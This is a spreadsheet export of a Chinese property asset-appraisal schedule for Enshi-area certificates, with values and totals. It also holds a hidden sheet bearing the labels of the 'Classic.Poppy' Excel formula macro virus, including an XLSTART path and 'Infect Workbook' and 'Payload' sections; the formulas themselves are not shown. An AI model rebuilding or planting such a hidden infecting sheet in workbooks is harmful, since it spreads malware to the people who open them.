[121,"鄂（2021）利川市不动产权第0007750号",null,null,"利川市都亭街道办事处教场村六组时代大厦301铺号",null,128.81,"其它商服用地","商业服务","2011-07-11","2051-07-11","混合结构",{"$nulls":3},"3",{"$nulls":6},"㎡",847.15,null,null,{"v":4066320,"d":"4,066,320.00"},{"v":4806,"d":"4,806.00"},{"v":4071402.9,"d":"4,071,402.90"},{"v":5082.9,"d":"5,082.90"},0.13]
[122,"鄂（2021）利川市不动产权第0007748号",null,null,"利川市都亭街道办事处教场村六组时代大厦401铺号",null,128.81,"其它商服用地","商业服务","2011-07-11","2051-07-11","混合结构",{"$nulls":3},"4",{"$nulls":6},"㎡",847.15,null,null,{"v":4066320,"d":"4,066,320.00"},{"v":4806,"d":"4,806.00"},{"v":4071402.9,"d":"4,071,402.90"},{"v":5082.9,"d":"5,082.90"},0.13]
[123,"鄂（2021）利川市不动产权第0007747号",null,null,"利川市都亭街道办事处教场村六组时代大厦501铺号",null,128.81,"其它商服用地","商业服务","2011-07-11","2051-07-11","混合结构",{"$nulls":3},"5",{"$nulls":6},"㎡",847.15,null,null,{"v":4066320,"d":"4,066,320.00"},{"v":4806,"d":"4,806.00"},{"v":4071402.9,"d":"4,071,402.90"},{"v":5082.9,"d":"5,082.90"},0.13]
[124,"鄂（2021）利川市不动产权第0007746号",null,null,"利川市都亭街道办事处教场村六组时代大厦601铺号",null,128.81,"其它商服用地","商业服务","2011-07-11","2051-07-11","混合结构",{"$nulls":3},"6",{"$nulls":6},"㎡",847.15,null,null,{"v":4066320,"d":"4,066,320.00"},{"v":4806,"d":"4,806.00"},{"v":4071402.9,"d":"4,071,402.90"},{"v":5082.9,"d":"5,082.90"},0.13]
[125,"鄂（2021）利川市不动产权第0007745号",null,null,"利川市都亭街道办事处教场村六组时代大厦701铺号",null,128.81,"其它商服用地","商业服务","2011-07-11","2051-07-11","混合结构",{"$nulls":3},"7",{"$nulls":6},"㎡",847.15,null,null,{"v":4066320,"d":"4,066,320.00"},{"v":4806,"d":"4,806.00"},{"v":4071402.9,"d":"4,071,402.90"},{"v":5082.9,"d":"5,082.90"},0.13]
[126,"鄂（2021）利川市不动产权第0007729号",null,null,"利川市都亭街道办事处教场村六组时代大厦801铺号",null,128.81,"其它商服用地","商业服务","2011-07-11","2051-07-11","混合结构",{"$nulls":3},"8",{"$nulls":6},"㎡",847.15,null,null,{"v":4066320,"d":"4,066,320.00"},{"v":4806,"d":"4,806.00"},{"v":4071402.9,"d":"4,071,402.90"},{"v":5082.9,"d":"5,082.90"},0.13]
[127,"鄂（2021）利川市不动产权第0007749号",null,null,"利川市都亭街道办事处教场村六组时代大厦901铺号",null,128.81,"其它商服用地","商业服务","2011-07-11","2051-07-11","混合结构",{"$nulls":3},"9",{"$nulls":6},"㎡",847.15,null,null,{"v":4066320,"d":"4,066,320.00"},{"v":4806,"d":"4,806.00"},{"v":4071402.9,"d":"4,071,402.90"},{"v":5082.9,"d":"5,082.90"},0.13]
[128,"鄂（2021）利川市不动产权第0007744号",null,null,"利川市都亭街道办事处教场村六组时代大厦1001铺号",null,50.16,"其它商服用地","商业服务","2011-07-11","2051-07-11","混合结构",{"$nulls":3},"10",{"$nulls":6},"㎡",329.88,null,null,{"v":1583424,"d":"1,583,424.00"},{"v":4806,"d":"4,806.00"},{"v":1585403.28,"d":"1,585,403.28"},{"v":1979.28,"d":"1,979.28"},0.13]
[129,"鄂（2021）利川市不动产权第0007742号",null,null,"利川市都亭街道办事处教场村六组时代大厦1101铺号",null,39.17,"其它商服用地","商业服务","2011-07-11","2051-07-11","混合结构",{"$nulls":3},"11",{"$nulls":6},"㎡",257.63,null,null,{"v":1236624,"d":"1,236,624.00"},{"v":4806,"d":"4,806.00"},{"v":1238169.78,"d":"1,238,169.78"},{"v":1545.78,"d":"1,545.78"},0.13]
[130,"鄂（2021）利川市不动产权第0007732号",null,null,"利川市都亭街道办事处教场村六组时代大厦1201铺号",null,39.17,"其它商服用地","商业服务","2011-07-11","2051-07-11","混合结构",{"$nulls":3},"12",{"$nulls":6},"㎡",257.63,null,null,{"v":1236624,"d":"1,236,624.00"},{"v":4806,"d":"4,806.00"},{"v":1238169.78,"d":"1,238,169.78"},{"v":1545.78,"d":"1,545.78"},0.13]
[131,"鄂（2021）利川市不动产权第0007734号",null,null,"利川市都亭街道办事处教场村六组时代大厦1301铺号",null,39.17,"其它商服用地","商业服务","2011-07-11","2051-07-11","混合结构",{"$nulls":3},"13",{"$nulls":6},"㎡",257.63,null,null,{"v":1236624,"d":"1,236,624.00"},{"v":4806,"d":"4,806.00"},{"v":1238169.78,"d":"1,238,169.78"},{"v":1545.78,"d":"1,545.78"},0.13]
[132,"鄂（2021）利川市不动产权第0007737号",null,null,"利川市都亭街道办事处教场村六组时代大厦1401铺号",null,39.17,"其它商服用地","商业服务","2011-07-11","2051-07-11","混合结构",{"$nulls":3},"14",{"$nulls":6},"㎡",257.63,null,null,{"v":1236624,"d":"1,236,624.00"},{"v":4806,"d":"4,806.00"},{"v":1238169.78,"d":"1,238,169.78"},{"v":1545.78,"d":"1,545.78"},0.13]
[133,"鄂（2021）巴东县不动产权第0012249号",null,null,"巴东县信陵镇西壤坡社区沿江大道132号4、6层",null,{"v":361.8,"d":"361.80"},"交通服务场站用地","其他商业","2003年","划拨用地","混合结构",{"$nulls":3},"4-6",{"$nulls":6},"㎡",{"v":1939.74,"d":"1,939.74"},null,null,{"v":7371000,"d":"7,371,000.00"},{"v":3816,"d":"3,816.00"},{"v":7402047.84,"d":"7,402,047.84"},{"v":31047.84,"d":"31,047.84"},0.42]
[134,"鄂（2021）恩施市不动产权第0013059号",null,null,"恩施市六角亭街道办事处叶挺路16号（阳光国际）5幢1单元1-702号",null,9.29,"城镇住宅用地","住宅","2011-09-18","2081-09-18","混合结构",{"$nulls":3},"7",{"$nulls":6},"㎡",137.82,null,null,{"v":689100,"d":"689,100.00"},{"v":5169,"d":"5,169.00"},{"v":712391.58,"d":"712,391.58"},{"v":23291.58,"d":"23,291.58"},3.38]
[135,"鄂（2021）恩施市不动产权第0013054号",null,null,"恩施市六角亭街道办事处叶挺路16号（阳光国际）5幢1单元1-802号",null,9.29,"城镇住宅用地","住宅","2011-09-18","2081-09-18","混合结构",{"$nulls":3},"8",{"$nulls":6},"㎡",137.82,null,null,{"v":689100,"d":"689,100.00"},{"v":5169,"d":"5,169.00"},{"v":712391.58,"d":"712,391.58"},{"v":23291.58,"d":"23,291.58"},3.38]
[136,"鄂（2021）恩施市不动产权第0013052号",null,null,"恩施市六角亭街道办事处叶挺路16号（阳光国际）5幢1单元1-803号",null,9.29,"城镇住宅用地","住宅","2011-09-18","2081-09-18","混合结构",{"$nulls":3},"8",{"$nulls":6},"㎡",137.82,null,null,{"v":689100,"d":"689,100.00"},{"v":5169,"d":"5,169.00"},{"v":712391.58,"d":"712,391.58"},{"v":23291.58,"d":"23,291.58"},3.38]
[137,"鄂（2021）恩施市不动产权第0013063号",null,null,"恩施市六角亭街道办事处叶挺路16号（阳光国际）5幢1单元1-902号",null,9.29,"城镇住宅用地","住宅","2011-09-18","2081-09-18","混合结构",{"$nulls":3},"9",{"$nulls":6},"㎡",137.82,null,null,{"v":689100,"d":"689,100.00"},{"v":5169,"d":"5,169.00"},{"v":712391.58,"d":"712,391.58"},{"v":23291.58,"d":"23,291.58"},3.38]
[138,"鄂（2021）恩施市不动产权第0013061号",null,null,"恩施市六角亭街道办事处叶挺路16号（阳光国际）5幢1单元1-903号",null,9.29,"城镇住宅用地","住宅","2011-09-18","2081-09-18","混合结构",{"$nulls":3},"9",{"$nulls":6},"㎡",137.82,null,null,{"v":689100,"d":"689,100.00"},{"v":5169,"d":"5,169.00"},{"v":712391.58,"d":"712,391.58"},{"v":23291.58,"d":"23,291.58"},3.38]
[139,"鄂（2021）恩施市不动产权第0013066号",null,null,"恩施市六角亭街道办事处叶挺路16号（阳光国际）5幢2单元2-702号",null,9.29,"城镇住宅用地","住宅","2011-09-18","2081-09-18","混合结构",{"$nulls":3},"7",{"$nulls":6},"㎡",137.82,null,null,{"v":689100,"d":"689,100.00"},{"v":5169,"d":"5,169.00"},{"v":712391.58,"d":"712,391.58"},{"v":23291.58,"d":"23,291.58"},3.38]
[140,"鄂（2021）恩施市不动产权第0013051号",null,null,"恩施市六角亭街道办事处叶挺路16号（阳光国际）5幢2单元2-703号",null,9.29,"城镇住宅用地","住宅","2011-09-18","2081-09-18","混合结构",{"$nulls":3},"7",{"$nulls":6},"㎡",137.82,null,null,{"v":689100,"d":"689,100.00"},{"v":5169,"d":"5,169.00"},{"v":712391.58,"d":"712,391.58"},{"v":23291.58,"d":"23,291.58"},3.38]
[141,"鄂（2021）恩施市不动产权第0013056号",null,null,"恩施市六角亭街道办事处叶挺路16号（阳光国际）5幢2单元2-802号",null,9.29,"城镇住宅用地","住宅","2011-09-18","2081-09-18","混合结构",{"$nulls":3},"8",{"$nulls":6},"㎡",137.82,null,null,{"v":689100,"d":"689,100.00"},{"v":5169,"d":"5,169.00"},{"v":712391.58,"d":"712,391.58"},{"v":23291.58,"d":"23,291.58"},3.38]
[142,"鄂（2021）恩施市不动产权第0013067号",null,null,"恩施市六角亭街道办事处叶挺路16号（阳光国际）5幢2单元2-902号",null,9.29,"城镇住宅用地","住宅","2011-09-18","2081-09-18","混合结构",{"$nulls":3},"9",{"$nulls":6},"㎡",137.82,null,null,{"v":689100,"d":"689,100.00"},{"v":5169,"d":"5,169.00"},{"v":712391.58,"d":"712,391.58"},{"v":23291.58,"d":"23,291.58"},3.38]
[143,"鄂（2021）恩施市不动产权第0013064号",null,null,"恩施市六角亭街道办事处叶挺路16号（阳光国际）5幢2单元2-903号",null,9.29,"城镇住宅用地","住宅","2011-09-18","2081-09-18","混合结构",{"$nulls":3},"9",{"$nulls":6},"㎡",137.82,null,null,{"v":689100,"d":"689,100.00"},{"v":5169,"d":"5,169.00"},{"v":712391.58,"d":"712,391.58"},{"v":23291.58,"d":"23,291.58"},3.38]
[144,"鄂（2021）恩施市不动产权第0013057号",null,null,"恩施市六角亭街道办事处叶挺路16号（阳光国际）6幢702号",null,10.01,"城镇住宅用地","住宅","2011-09-18","2081-09-18","混合结构",{"$nulls":3},"7",{"$nulls":6},"㎡",136.54,null,null,{"v":682700,"d":"682,700.00"},{"v":5169,"d":"5,169.00"},{"v":705775.26,"d":"705,775.26"},{"v":23075.26,"d":"23,075.26"},3.38]
[145,"鄂（2021）恩施市不动产权第0013058号",null,null,"恩施市六角亭街道办事处叶挺路16号（阳光国际）6幢703号",null,10.01,"城镇住宅用地","住宅","2011-09-18","2081-09-18","混合结构",{"$nulls":3},"7",{"$nulls":6},"㎡",136.54,null,null,{"v":682700,"d":"682,700.00"},{"v":5169,"d":"5,169.00"},{"v":705775.26,"d":"705,775.26"},{"v":23075.26,"d":"23,075.26"},3.38]
[146,"鄂（2021）恩施市不动产权第0013060号",null,null,"恩施市六角亭街道办事处叶挺路16号（阳光国际）6幢802号",null,10.01,"城镇住宅用地","住宅","2011-09-18","2081-09-18","混合结构",{"$nulls":3},"8",{"$nulls":6},"㎡",136.54,null,null,{"v":682700,"d":"682,700.00"},{"v":5169,"d":"5,169.00"},{"v":705775.26,"d":"705,775.26"},{"v":23075.26,"d":"23,075.26"},3.38]
[147,"鄂（2021）恩施市不动产权第0013065号",null,null,"恩施市六角亭街道办事处叶挺路16号（阳光国际）6幢803号",null,10.01,"城镇住宅用地","住宅","2011-09-18","2081-09-18","混合结构",{"$nulls":3},"8",{"$nulls":6},"㎡",136.54,null,null,{"v":682700,"d":"682,700.00"},{"v":5169,"d":"5,169.00"},{"v":705775.26,"d":"705,775.26"},{"v":23075.26,"d":"23,075.26"},3.38]
[148,"鄂（2021）恩施市不动产权第0013050号",null,null,"恩施市六角亭街道办事处叶挺路16号（阳光国际）6幢1202号",null,10.01,"城镇住宅用地","住宅","2011-09-18","2081-09-18","混合结构",{"$nulls":3},"12",{"$nulls":6},"㎡",136.54,null,null,{"v":682700,"d":"682,700.00"},{"v":5169,"d":"5,169.00"},{"v":705775.26,"d":"705,775.26"},{"v":23075.26,"d":"23,075.26"},3.38]
[149,"鄂（2021）恩施市不动产权第0013062号",null,null,"恩施市六角亭街道办事处叶挺路16号（阳光国际）6幢1301号",null,9.91,"城镇住宅用地","住宅","2011-09-18","2081-09-18","混合结构",{"$nulls":3},"13",{"$nulls":6},"㎡",135.17,null,null,{"v":675900,"d":"675,900.00"},{"v":5169,"d":"5,169.00"},{"v":698693.73,"d":"698,693.73"},{"v":22793.73,"d":"22,793.73"},3.37]
[150,"鄂（2021）恩施市不动产权第0013055",null,null,"恩施市六角亭街道办事处叶挺路16号（阳光国际）7幢1单元1-1101号",null,10.25,"城镇住宅用地","住宅","2011-09-18","2081-09-18","混合结构",{"$nulls":3},"11",{"$nulls":6},"㎡",139.87,null,null,{"v":699400,"d":"699,400.00"},{"v":5169,"d":"5,169.00"},{"v":722988.03,"d":"722,988.03"},{"v":23588.03,"d":"23,588.03"},3.37]
[151,"鄂（2021）恩施市不动产权第0013053号",null,null,"恩施市六角亭街道办事处叶挺路16号（阳光国际）7幢1单元1-1401号",null,10.25,"城镇住宅用地","住宅","2011-09-18","2081-09-18","混合结构",{"$nulls":3},"14",{"$nulls":6},"㎡",139.87,null,null,{"v":699400,"d":"699,400.00"},{"v":5169,"d":"5,169.00"},{"v":722988.03,"d":"722,988.03"},{"v":23588.03,"d":"23,588.03"},3.37]
[152,"鄂（2021）恩施市不动产权第0030183号",null,null,"恩施舞阳大街5号清江宾馆",null,10.34,"城镇住宅用地","住宅",null,"/","混合结构",{"$nulls":3},"1",{"$nulls":6},"㎡",68.32,null,null,{"v":146178224.43,"d":"146,178,224.43"},{"v":5270,"d":"5,270.00"},{"v":360046.4,"d":"360,046.40"},{"v":9578272.67,"d":"9,578,272.67"},6.55]
[153,"鄂（2021）恩施市不动产权第0030175号",null,null,"恩施舞阳大街5号清江宾馆",null,{"v":12692.31,"d":"12,692.31"},"商服用地","商业服务",null,"/","混合结构",{"$nulls":3},"1",{"$nulls":6},"㎡",{"v":29832.3,"d":"29,832.30"},{"$nulls":3},{"v":5209,"d":"5,209.00"},{"v":155396450.7,"d":"155,396,450.70"}]
[154,"鄂（2021）恩施市不动产权第0035427号",null,null,"恩施东风大道268号资产",null,3.07,"城镇住宅用地","办公",null,"/","混合结构",{"$nulls":3},"8",{"$nulls":6},"㎡",19.35,null,null,{"v":4720060,"d":"4,720,060.00"},{"v":4539,"d":"4,539.00"},{"v":87829.65,"d":"87,829.65"},{"v":-878123.56,"d":"-878,123.56"},-0.19]
[155,"鄂（2021）恩施市不动产权第0035433号",null,null,"恩施东风大道268号资产",null,23.44,"城镇住宅用地","办公",null,"/","混合结构",{"$nulls":3},"8",{"$nulls":6},"㎡",147.68,{"$nulls":3},{"v":4539,"d":"4,539.00"},{"v":670319.52,"d":"670,319.52"}]
[156,"鄂（2021）恩施市不动产权第0035432号",null,null,"恩施东风大道268号资产",null,{"v":23.3,"d":"23.30"},"城镇住宅用地","办公",null,"/","混合结构",{"$nulls":3},"7",{"$nulls":6},"㎡",146.83,{"$nulls":3},{"v":4539,"d":"4,539.00"},{"v":666461.37,"d":"666,461.37"}]
[157,"鄂（2021）恩施市不动产权第0035426号",null,null,"恩施东风大道268号资产",null,15.54,"城镇住宅用地","住宅",null,"/","混合结构",{"$nulls":3},"7",{"$nulls":6},"㎡",97.88,{"$nulls":3},{"v":4539,"d":"4,539.00"},{"v":444277.32,"d":"444,277.32"}]
[158,"鄂（2021）恩施市不动产权第0035425号",null,null,"恩施东风大道268号资产",null,15.27,"城镇住宅用地","住宅",null,"/","混合结构",{"$nulls":3},"7",{"$nulls":6},"㎡",96.22,{"$nulls":3},{"v":4539,"d":"4,539.00"},{"v":436742.58,"d":"436,742.58"}]
[159,"鄂（2021）恩施市不动产权第0035430号",null,null,"恩施东风大道268号资产",null,11.19,"城镇住宅用地","办公",null,"/","混合结构",{"$nulls":3},"6",{"$nulls":6},"㎡",70.51,{"$nulls":3},{"v":4539,"d":"4,539.00"},{"v":320044.89,"d":"320,044.89"}]
[160,"鄂（2021）恩施市不动产权第0035431号",null,null,"恩施东风大道268号资产",null,13.72,"城镇住宅用地","办公",null,"/","混合结构",{"$nulls":3},"5",{"$nulls":6},"㎡",86.43,{"$nulls":3},{"v":4539,"d":"4,539.00"},{"v":392305.77,"d":"392,305.77"}]
[161,"鄂（2021）恩施市不动产权第0035428号",null,null,"恩施东风大道268号资产",null,11.19,"城镇住宅用地","办公",null,"/","混合结构",{"$nulls":3},"4",{"$nulls":6},"㎡",70.51,{"$nulls":3},{"v":4539,"d":"4,539.00"},{"v":320044.89,"d":"320,044.89"}]
[162,"鄂（2021）恩施市不动产权第0035422号",null,null,"恩施东风大道268号资产",null,4.93,"商服用地","商业服务",null,"/","混合结构",{"$nulls":3},"1",{"$nulls":6},"㎡",31.05,{"$nulls":3},{"v":16229,"d":"16,229.00"},{"v":503910.45,"d":"503,910.45"}]
[163,"鄂（2021）恩施市不动产权第0025914号",null,null,"恩施东风大道593号资产",null,463.17,"商服用地","商业服务",null,"2052-07-04","混合结构",{"$nulls":3},"1",{"$nulls":6},"㎡",461.62,null,null,{"v":7385900,"d":"7,385,900.00"},{"v":16572,"d":"16,572.00"},{"v":7649970,"d":"7,649,970.00"},{"v":264070,"d":"264,070.00"},3.58]
[164,"鄂（2021）恩施市不动产权第0025912号",null,null,"恩施亚洲大酒店东风大道593号",null,18.41,"商服用地","商业服务",null,"2052-07-04","混合结构",{"$nulls":3},"1",{"$nulls":6},"㎡",18.41,null,null,{"v":44696500,"d":"44,696,500.00"},{"v":16572,"d":"16,572.00"},{"v":305090.52,"d":"305,090.52"},{"v":3112943.32,"d":"3,112,943.32"},0.07]
[165,"鄂（2021）恩施市不动产权第0041620号",null,null,"恩施亚洲大酒店东风大道593号",null,{"v":6515.62,"d":"6,515.62"},"商服用地","商业服务",null,"2052-07-04","混合结构",{"$nulls":3},"1-6",{"$nulls":6},"㎡",{"v":9917.87,"d":"9,917.87"},{"$nulls":3},{"v":4145,"d":"4,145.00"},{"v":41109571.15,"d":"41,109,571.15"}]
[null,"鄂（2021）恩施市不动产权第0041526号",null,null,"恩施亚洲大酒店东风大道593号",null,984.07,"商服用地","办公",null,"2052-07-04","混合结构",{"$nulls":3},"1-3",{"$nulls":6},"㎡",{"v":1542.77,"d":"1,542.77"},{"$nulls":3},{"v":4145,"d":"4,145.00"},{"v":6394781.65,"d":"6,394,781.65"}]
[166,"土地、尚未办证",null,null,"张家界覃家岗资产",null,{"v":3560.2,"d":"3,560.20"},"工业用地",null,null,"2046-01-10",{"$nulls":11},"㎡","/",null,null,{"v":1495284,"d":"1,495,284.00"},{"v":653,"d":"653.00"},{"v":2324810.6,"d":"2,324,810.60"},{"v":829526.6,"d":"829,526.60"},55.48]
[167,"鄂（2020）恩施市不动产权第0036204号",null,null,"恩施工人文化宫",null,{"v":6717.37,"d":"6,717.37"},"交通服务场站用地","地下停车场","2019-11-13","2069-11-13",{"$nulls":11},"㎡","/",null,null,{"v":31077269.09,"d":"31,077,269.09"},{"v":4975,"d":"4,975.00"},{"v":33418915.75,"d":"33,418,915.75"},{"v":2341646.66,"d":"2,341,646.66"},7.53]
[168,"鄂（2022）恩施市不动产权第0002613号",null,null,"恩施市舞阳街道办事处新建街65号1幢101号",null,1179.23,"划拨/存量房","机关团体用地/办公",null,"--","钢混",{"$nulls":3},"1",{"$nulls":6},"㎡",145.21]
[169,"鄂（2022）恩施市不动产权第0002618号",null,null,"恩施市舞阳街道办事处新建街65号",null,null,"划拨/自建房","机关团体用地/办公",null,"--","钢混",{"$nulls":3},"1-2",{"$nulls":6},"㎡",376.15]
[170,"鄂（2022）恩施市不动产权第0019072号",null,null,"恩施市金子坝街道办事处施州大道312号办公房幢101-801号",null,4957.51,"划拨/存量房","机关团体用地/办公",null,"--","钢混",{"$nulls":3},"1-8",{"$nulls":6},"㎡",2878.56]
[171,"鄂（2022）恩施市不动产权第0019073号",null,null,"恩施市金子坝街道办事处施州大道312号门卫室幢101-201",null,null,"划拨/存量房","机关团体用地/其他 ",null,"--","钢混",{"$nulls":3},"1-2",{"$nulls":6},"㎡",48.94]
[172,"鄂（2022）恩施市不动产权第0019878号",null,null,"恩施市舞阳街道办事处舞阳大街213号1幢101、101附属号",null,136.51,"划拨/自建房","机关团体用地/办公",null,"--","钢混",{"$nulls":3},"1",{"$nulls":6},"㎡",455.54]
[173,"鄂（2022）恩施市不动产权第0019877号",null,null,"恩施市舞阳街道办事处舞阳大街213号1幢201、201附属号",null,156.84,"划拨/自建房","机关团体用地/办公",null,"--","钢混",{"$nulls":3},"2",{"$nulls":6},"㎡",523.38]
[174,"鄂（2022）恩施市不动产权第0019876号",null,null,"恩施市舞阳街道办事处舞阳大街213号1幢301号",null,33.35,"划拨/自建房","机关团体用地/办公",null,"--","钢混",{"$nulls":3},"3",{"$nulls":6},"㎡",111.29]
[175,"鄂（2022）恩施市不动产权第0020092号",null,null,"恩施市舞阳街道办事处舞阳大街一巷120号1幢1单元1-1号",null,23.82,"划拨/房改房","城镇住宅用地/住宅",null,"--","钢混",{"$nulls":3},"1",{"$nulls":6},"㎡",78.79]
[176,"鄂（2022）恩施市不动产权第0020091号",null,null,"恩施市舞阳街道办事处舞阳大街一巷120号1幢1单元1-2号",null,23.82,"划拨/房改房","城镇住宅用地/住宅",null,"--","钢混",{"$nulls":3},"1",{"$nulls":6},"㎡",78.79]
[177,"鄂（2022）恩施市不动产权第0020096号",null,null,"恩施市舞阳街道办事处舞阳大街一巷120号1幢2单元2-1号",null,23.82,"划拨/房改房","城镇住宅用地/住宅",null,"--","钢混",{"$nulls":3},"1",{"$nulls":6},"㎡",78.79]
[178,"鄂（2022）恩施市不动产权第0020095号",null,null,"恩施市舞阳街道办事处舞阳大街一巷120号1幢2单元2-2号",null,23.82,"划拨/房改房","城镇住宅用地/住宅",null,"--","钢混",{"$nulls":3},"1",{"$nulls":6},"㎡",78.79]
[179,"鄂（2022）恩施市不动产权第0020093号",null,null,"恩施市舞阳街道办事处舞阳大街一巷120号1幢3单元3-1号",null,23.82,"划拨/房改房","城镇住宅用地/住宅",null,"--","钢混",{"$nulls":3},"1",{"$nulls":6},"㎡",78.79]
[180,"鄂（2022）恩施市不动产权第0020094号",null,null,"恩施市舞阳街道办事处舞阳大街一巷120号1幢3单元3-2号",null,23.82,"划拨/房改房","城镇住宅用地/住宅",null,"--","钢混",{"$nulls":3},"1",{"$nulls":6},"㎡",78.79]
[181,"鄂（2022）恩施市不动产权第0020312号",null,null,"恩施市六角亭街道办事处胜利街2号",null,927.49,"出让/自建房","商服用地/商业服务",null,"2032-12-01","钢混",{"$nulls":3},"1-5",{"$nulls":6},"㎡",2120.21]
[182,"鄂（2022）恩施市不动产权第0020356号",null,null,"恩施市六角亭街道办事处人民路26号",null,3511.96,"划拨/自建房","教育用地/其他",null,"--","钢混",{"$nulls":3},"1-6",{"$nulls":6},"㎡",3855.35]
[183,"鄂（2022）恩施市不动产权第0020472号",null,null,"恩施市六角亭街道办事处胜利街2号3幢101号",null,27.43,"划拨/自建房","城镇住宅用地/住宅",null,"--","钢混",{"$nulls":3},"1",{"$nulls":6},"㎡",137.13]
[184,"鄂（2022）恩施市不动产权第0025178号",null,null,"恩施市舞阳坝街道办事处东风大道254号3幢110号",null,8.19,"划拨/房改房","商服用地/商业服务",null,"--","钢混",{"$nulls":3},"1",{"$nulls":6},"㎡",52.88]
[185,"鄂（2022）恩施市不动产权第0029092号",null,null,"恩施市小渡船街道办事处民族东路2巷1幢1单元101号",null,11.97,"出让/存量房","商服用地/商业服务",null,"2026-01-01","钢混",{"$nulls":3},"1",{"$nulls":6},"㎡",119.61]
[186,"鄂（2022）恩施市不动产权第0027865号",null,null,"恩施市小渡船街道办事处民族东路2巷1幢1单元201-202号",null,26.5,"出让/存量房","城镇住宅用地/住宅",null,"2026-01-01","钢混",{"$nulls":3},"2",{"$nulls":6},"㎡",264.97]
[187,"鄂（2022）恩施市不动产权第0027867号",null,null,"恩施市小渡船街道办事处民族东路2巷1幢1单元301号",null,11.76,"出让/存量房","城镇住宅用地/住宅",null,"2026-01-01","钢混",{"$nulls":3},"3",{"$nulls":6},"㎡",117.58]
[188,"鄂（2022）恩施市不动产权第0027873号",null,null,"恩施市舞阳街道办事处（金凤苑小区）4幢门-4号",null,3.87,"出让/市场化商品房","商服用地/商业服务",null,"2040-03-01","钢混",{"$nulls":3},"1",{"$nulls":6},"㎡",21.04]
[189,"鄂（2022）恩施市不动产权第0027870号",null,null,"恩施市舞阳街道办事处（金凤苑小区）4幢门-5号",null,3.87,"出让/市场化商品房","商服用地/商业服务",null,"2040-03-01","钢混",{"$nulls":3},"1",{"$nulls":6},"㎡",21.04]
[190,"鄂（2022）恩施市不动产权第0027874号",null,null,"恩施市舞阳街道办事处（金凤苑小区）4幢门-6号",null,5.8,"出让/市场化商品房","商服用地/商业服务",null,"2040-03-01","钢混",{"$nulls":3},"1",{"$nulls":6},"㎡",31.56]
[191,"鄂（2022）恩施市不动产权第0027868号",null,null,"恩施市舞阳街道办事处（金凤苑小区）4幢门-7号",null,5.8,"出让/市场化商品房","商服用地/商业服务",null,"2040-03-01","钢混",{"$nulls":3},"1",{"$nulls":6},"㎡",31.56]
[192,"鄂（2022）恩施市不动产权第0027872号",null,null,"恩施市舞阳街道办事处（金凤苑小区）4幢门-8号",null,3.87,"出让/市场化商品房","商服用地/商业服务",null,"2040-03-01","钢混",{"$nulls":3},"1",{"$nulls":6},"㎡",21.04]
[193,"鄂（2022）恩施市不动产权第0027871号",null,null,"恩施市舞阳街道办事处（金凤苑小区）4幢门-9号",null,3.87,"出让/市场化商品房","商服用地/商业服务",null,"2040-03-01","钢混",{"$nulls":3},"1",{"$nulls":6},"㎡",21.04]
[194,"鄂（2022）恩施市不动产权第0027869号",null,null,"恩施市舞阳街道办事处（金凤苑小区）4幢门-10号",null,5.8,"出让/市场化商品房","商服用地/商业服务",null,"2040-03-01","钢混",{"$nulls":3},"1",{"$nulls":6},"㎡",31.56]
[195,"鄂（2022）恩施市不动产权第0027842号",null,null,"恩施市舞阳坝街道办事处东风大道593号3幢1-14号",null,8.73,"出让/自建房","商服用地/商业服务",null,"2052-07-01","钢混",{"$nulls":3},"1",{"$nulls":6},"㎡",62.37]
[]
["特别提示：如集团公司11-12月有新注入 或购进资产，一并纳入本次评估范围，评估费用不额外增加。"]
["合            计",{"$nulls":22},{"v":99731.43,"d":"99,731.43"},null,0,{"v":707793497.52,"d":"707,793,497.52"},null,{"v":710375897.52,"d":"710,375,897.52"},{"v":2582400,"d":"2,582,400.00"},0.36]

{"sheet":"00000000","index":1,"n_rows":26,"n_cols":3,"rows_kept":26,"hidden":true,"flags":["formulas_cached_only"]}
[""]
["Book1"]
["D:\\MICROSOFT OFFICE\\OFFICE\\xlstart\\Book1.",null,"**Auto and On Sheet Starts Here**"]
[3]
[]
[]
["Classic.Poppy by VicodinES"]
["With Lord Natas"]
["An Excel Formula Macro Virus (XF.Classic)"]
["Hydrocodone/APAP 10-650 For Your Computer"]
["(C) The Narkotic Network 1998"]
[]
[]
["**Simple Payload**"]
[]
[]
[null,null,"**Set Our Values and Paths**"]
[]
[]
["**Add New Workbook, Infect It, Save It As Book1.xls**"]
[]
[]
[]
[]
[]
[null,null,"**Infect Workbook**"]